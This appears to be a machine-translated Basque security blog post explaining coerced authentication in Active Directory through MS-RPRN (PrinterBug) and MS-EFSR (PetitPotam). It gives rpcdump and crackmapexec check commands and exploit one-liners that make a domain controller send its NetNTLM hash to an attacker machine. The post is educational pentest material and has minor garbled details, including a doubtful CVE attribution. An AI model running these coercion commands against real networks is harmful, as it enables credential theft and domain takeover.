Coerce | Parte 1

Bortxaketa | 1. zatia


Active Directory ingurunearen barruan, erasotzaileek behartutako autentifikazioa eta MitM estrategiak erabiltzen dituzte hainbat ekintza burutzeko. Horregatik, oraingo honetan, Bortxazko Autentifikazioaren gaian sartuko gara. Post ezberdinetan zehar teknika hau egiteko modu desberdinak azalduko ditugu, baita domeinu batean pribilegioak igotzeko beste eraso batzuekin nola lotu ere.

"Coerce autentifikazioa" Windows Remote Procedure Calls (RPC) deien bidez zerbitzu bat makina baten aurka autentifikatzera behartzen duen teknika da. Teknika hau erabiliz, erasotzaileak zerbitzari zaurgarri bat erasotzaileak kontrolatzen duen makina baten aurka autentifikatzera behartu dezake eta horrela NetNTLM formatuan makina-kontuaren pasahitzaren hash-a lor dezake.

Windows sareetako makina-kontu batek sareko gailu bati lotutako identitate esklusiboari egiten dio erreferentzia. Makina-kontuak ezinbestekoak dira Windows sistema eragileak dituzten sare-ingurunean gailuen arteko komunikazioa eta lankidetza ezartzeko.

Makina-kontu baten hash-a lortu ondoren, teknika posibleak zabaltzen dira autentifikazio hori biktimaren nortasuna ordezkatzeko aprobetxatzeko. Teknika honen kritikotasunaren zati bat makina bat biktima izatean datza. Adibidez, teknika hau domeinu-kontrolatzaile baten aurka erabiltzen bada, posible da domeinu osoa arriskuan jartzea, eta horrela teknika horren kritikotasuna areagotuz.

Zer da RPC?

RPC-k Remote Procedure Call-ek esan nahi du, hau da, prozesuen arteko komunikazio modu bat (IPC). Teknologia horri esker, aplikazioek elkarri seinaleak bidal ditzakete eragiketa bat egiteko.

Windows inguruneetan, RPC asko erabiltzen da hainbat zerbitzutarako, hala nola, zereginak antolatzeko, zerbitzuak sortzeko, inprimagailuak konfiguratzeko, partekatutako baliabideak konfiguratzeko, urrunetik biltegiratutako datu enkriptatuak kudeatzeko, besteak beste.

RPC urruneko bektore gisa duen izaera dela eta, arreta handia erakartzen du segurtasun informatikoaren ikuspuntutik.

RPC zaurgarri nagusiak 

Ondoren, "Coerce Authentication" teknika erabiltzeko ezagunak diren RPC ahul nagusiak zerrendatzen jarraituko dugu.

Kontuan izan behar da, RPC horiek ustiatzeko, beharrezkoa dela domeinuko erabiltzaile-kontu balioduna izatea, nahiz eta MS-EFSR izenez ezagutzen den RPCren kasuan, erabiltzailerik gabe exekutatu daitekeen.

Bigarren kasu honetarako, non esplotazioa anonimoa zen, Microsoft-ek ahultasuntzat jo du eta segurtasun-adabakiak kaleratu ditu hura zuzentzeko.

MS-RPRN

MS-RPRN Urruneko Prozedura Deia da urruneko inprimaketa-sistemaren protokoloarekin lotutakoa.

Microsoft-en Print Spooler inprimatze-lanak eta inprimaketarekin lotutako beste zeregin batzuk kudeatzen dituen zerbitzua da. Domeinu-erabiltzaile/ordenagailu bat kontrolatzen duen erasotzaile batek, RPC dei zehatz batekin, hura exekutatzen duen helburu baten spooler-zerbitzua aktibatu eta erasotzaileak aukeratutako helburu batean autentifikatzea eragin dezake. Portaera hau Microsoft-en "Konponduko da" gisa markatuta dago eta lehenespenez gaituta dago Windows ingurune guztietan.

Egiaztapena

Biktimaren ordenagailuan RPC gaituta dagoen egiaztatzeko, impacket -en rpcdump tresna erabil dezakezu:

Komandoa: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'

  

Ilustración 1 – MS-RPRN habilitado.

Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.

esplotazioa


Biktimarengan “MS-RPRN” izeneko RPC gaituta dagoela egiaztatu ondoren, domeinu-erabiltzailea beste bide batzuen bidez arriskuan jartzeaz gain, esleitzen zaion Printer Bug edo SpoolSample izeneko PoC baten bidez ustiatu egingo da. CVE identifikatzailea. -2021-34527. 

Era berean, autentifikazioa behar bezala behartuta dagoela egiaztatzeko, “dc.corp.lab” domeinuan pribilegio mugatuak dituen “bob” erabiltzailea erabiliko dugu.

Komandoa: python3 printerbug.py "CORP/bob: @dc.corp.lab" attack_machine

Ilustración 2 – Explotación satisfactoria de printerbug.



Ahultasuna ustiatu ondoren, domeinu-kontrolatzailearen makina kontuaren netNTLMv2 hash-a lortu zen. 

Ilustración 3 – Obtención hash NetNTLM.


MS-EFSR


MS-EFSR Urruneko Fitxategiak Enkriptatzeko Sistemaren protokoloarekin erlazionatutako Urruneko Prozedura Deia da. Mantentze- eta kudeaketa-eragiketak egiten ditu urrunetik gordetzen diren eta sare baten bidez atzitzen diren eta RPC interfaze gisa eskuragarri dauden datu enkriptatuetan.
Kontuan izan behar da jatorrian RPC hau modu anonimoan ustiatu zela, aurretik domeinuko erabiltzaile-kontu bat arriskuan jarri behar izan gabe. Horregatik, Microsoft-ek bi segurtasun adabaki kaleratu zituen, biak 2021eko abuztuaren 10ean eta 2022ko maiatzaren 10ean, domeinuko erabiltzailerik gabe teknika hau egin ahal izateko aukera konpontzeaz arduratzen direnak.

Egiaztapena


Kasu honetan, gaur egun netexec izenez ezagutzen den crackmapexec tresna erabiliko dugu "petitpotam" moduluaren exekuzioaren bidez, zerbitzaria zaurgarria den ala ez modu anonimoan egiaztatzeko:

Komandoa: crackmapexec smb dc.corp.lab -M petitpotam

Ilustración 4 – Domain Controler vulnerable.

Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.

esplotazioa


Domeinu-kontrolatzailea modu anonimoan zaurgarria dela egiaztatu ondoren, CVE-2021-36942 eta CVE-2022-26925 bi identifikatzaile esleituta dituen Petit Potam izeneko PoC baten bidez ustiatuko da.

Autentifikazioa modu anonimoan behartuta dagoela egiaztatzeko, PoC exekutatuko dugu erabiltzailea (-u), pasahitza (-p) eta domeinua (-d) parametroak hutsik utziz.

Komandoa: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab

Ilustración 5 – Explotación satisfactoria de PetitPotam.

NetNTLM hash-aren harrapaketa Erantzun tresnan ikus dezakezu.

Ilustración 7 – Obtención hash NetNTLM.


Etorkizuneko zatietan Beste RCP ahulei buruz buruz hitz egiten jarraituko dugu, hurrengora arte! Agur!

Dimas Pastor , Grupo Zerolynxeko analista seniorra .
Itzuli blogera

Utzi iruzkin bat

Kontuan izan iruzkinak argitaratu aurretik onartu behar direla.